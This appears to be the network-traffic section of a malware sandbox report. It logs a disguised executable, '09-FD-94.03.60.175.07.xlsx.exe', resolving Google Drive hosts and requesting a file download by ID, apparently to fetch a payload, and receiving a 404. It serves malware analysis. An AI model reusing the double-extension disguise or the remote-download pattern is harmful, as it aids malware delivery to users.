                                                        Dec 16, 2024 17:58:18.458511114 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:18.458678961 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:18.458714008 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:18.458769083 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:18.458787918 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:18.458811045 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:18.458863020 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:18.458916903 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:18.459019899 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:18.459073067 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:18.459734917 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:18.459734917 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:18.459774017 CET44349724142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:18.459841967 CET49724443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:18.572860003 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:18.572917938 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:18.573007107 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:18.573471069 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:18.573487043 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:20.269676924 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:20.269753933 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:20.270457029 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:20.270505905 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:20.272475004 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:20.272486925 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:20.272833109 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:20.272886992 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:20.273266077 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:20.315376997 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:21.222450018 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:21.222604036 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:21.222636938 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:21.222698927 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:21.222779036 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:21.222810030 CET44349725172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:21.222866058 CET49725443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:21.234838963 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:21.234869003 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:21.234941959 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:21.235184908 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:21.235198021 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:23.083842039 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:23.084167957 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:23.084624052 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:23.084633112 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:23.084804058 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:23.084810019 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:24.048048973 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:24.048161983 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:24.048178911 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:24.048235893 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:24.048485041 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:24.048538923 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:24.048544884 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:24.048567057 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:24.048585892 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:24.048630953 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:24.049429893 CET49726443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:24.049442053 CET44349726142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:24.181571007 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:24.181615114 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:24.181714058 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:24.182100058 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:24.182107925 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:25.895214081 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:25.895382881 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:25.898272991 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:25.898432970 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:25.900285959 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:25.900306940 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:25.901173115 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:25.901247025 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:25.901597023 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:25.943337917 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:26.824320078 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:26.824412107 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:26.824434996 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:26.824485064 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:26.824518919 CET44349727172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:26.824546099 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:26.824570894 CET49727443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:26.831031084 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:26.831072092 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:26.831157923 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:26.831372023 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:26.831387043 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:28.620512009 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:28.620598078 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:28.621092081 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:28.621108055 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:28.621279955 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:28.621287107 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:29.565064907 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:29.565237999 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.565254927 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:29.565306902 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.566173077 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:29.566237926 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.566247940 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:29.566262007 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:29.566293001 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.566329956 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.566399097 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.566412926 CET44349728142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:58:29.566428900 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.566457033 CET49728443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:58:29.697637081 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:29.697690964 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:29.697792053 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:29.698133945 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:29.698142052 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:31.398271084 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:31.398658991 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:31.399085999 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:31.399092913 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:31.399271965 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:31.399277925 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:32.305905104 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:32.306022882 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:32.312009096 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:32.312100887 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:32.312172890 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:32.312222004 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:32.324635983 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:32.324656010 CET44349730172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:58:32.324668884 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:32.324712992 CET49730443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:58:32.333074093 CET49736443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:10.268214941 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.268313885 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.268353939 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.268405914 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.268857002 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.268906116 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.268982887 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.269027948 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.280675888 CET49829443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:10.280718088 CET44349829172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:10.297277927 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:10.297347069 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:10.297420979 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:10.302861929 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:10.302901983 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:11.997070074 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:11.997155905 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:11.997663021 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:11.997694969 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:11.997840881 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:11.997854948 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.944087982 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945013046 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945139885 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:12.945168018 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945271969 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:12.945331097 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:12.947024107 CET49835443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:12.947046995 CET44349835142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:13.072477102 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:13.072586060 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:13.072736025 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:13.073101997 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:13.073179960 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:14.770392895 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:14.770459890 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:14.770939112 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:14.770951033 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:14.771297932 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:14.771310091 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.674804926 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.674896955 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.674957037 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.675024986 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.675077915 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.675132990 CET44349841172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:15.675192118 CET49841443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:15.694299936 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:15.694349051 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:15.694422007 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:15.694627047 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:15.694655895 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:17.391810894 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:17.391916990 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:17.392412901 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:17.392440081 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:17.392589092 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:17.392601967 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.349292994 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.349390030 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.349421978 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.349474907 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350234032 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.350310087 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350317001 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.350358963 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350415945 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.350492954 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350789070 CET49849443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:18.350807905 CET44349849142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:18.478457928 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:18.478509903 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:18.478709936 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:18.479049921 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:18.479069948 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.270028114 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.270127058 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.271250010 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.271352053 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.273653030 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.273678064 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.274080038 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:20.274220943 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.274579048 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:20.315335035 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.190777063 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.190845013 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.190875053 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.191129923 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.191741943 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.191843033 CET44349856172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:21.191936016 CET49856443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:21.216115952 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:21.216156960 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:21.216217041 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:21.216562986 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:21.216578007 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:22.920037985 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:22.920128107 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:22.920567989 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:22.920573950 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:22.920747042 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:22.920752048 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.873908043 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874824047 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.874856949 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874865055 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874932051 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.874938011 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.874943972 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:23.875000954 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.875508070 CET49863443192.168.2.8142.250.181.1
                                                        Dec 16, 2024 17:59:23.875523090 CET44349863142.250.181.1192.168.2.8
                                                        Dec 16, 2024 17:59:24.041398048 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:24.041455030 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:24.041575909 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:24.041912079 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:24.041925907 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:25.744683981 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:25.744760036 CET49869443192.168.2.8172.217.19.174
                                                        Dec 16, 2024 17:59:25.745552063 CET44349869172.217.19.174192.168.2.8
                                                        Dec 16, 2024 17:59:25.745599985 CET49869443192.168.2.8172.217.19.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 17:57:39.489759922 CET | 50595 | 53 | 192.168.2.8 | 1.1.1.1
Dec 16, 2024 17:57:39.627165079 CET | 53 | 50595 | 1.1.1.1 | 192.168.2.8
Dec 16, 2024 17:57:42.281119108 CET | 55129 | 53 | 192.168.2.8 | 1.1.1.1
Dec 16, 2024 17:57:42.421823025 CET | 53 | 55129 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 17:57:39.489759922 CET | 192.168.2.8 | 1.1.1.1 | 0x36bc | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 17:57:42.281119108 CET | 192.168.2.8 | 1.1.1.1 | 0x8cb1 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 17:57:39.627165079 CET | 1.1.1.1 | 192.168.2.8 | 0x36bc | No error (0) | drive.google.com | | 172.217.19.174 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 17:57:42.421823025 CET | 1.1.1.1 | 192.168.2.8 | 0x8cb1 | No error (0) | drive.usercontent.google.com | | 142.250.181.1 | A (IP address) | IN (0x0001) | false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49709 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:57:41 UTC | 216 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
2024-12-16 16:57:42 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:41 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-VfbgEh3aKhelumzIyQyebQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49711 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:57:44 UTC | 258 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
2024-12-16 16:57:45 UTC | 2218 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC60LLM-YOjU2VrKMTjpmXbpPVmM74hqJjyQrxmJmjl24gxzL-xoK9fFdX9dHWiI3VV-
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:44 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-_i5LuK7XBh8MWkD8_0OGOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Set-Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY; expires=Tue, 17-Jun-2025 16:57:44 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
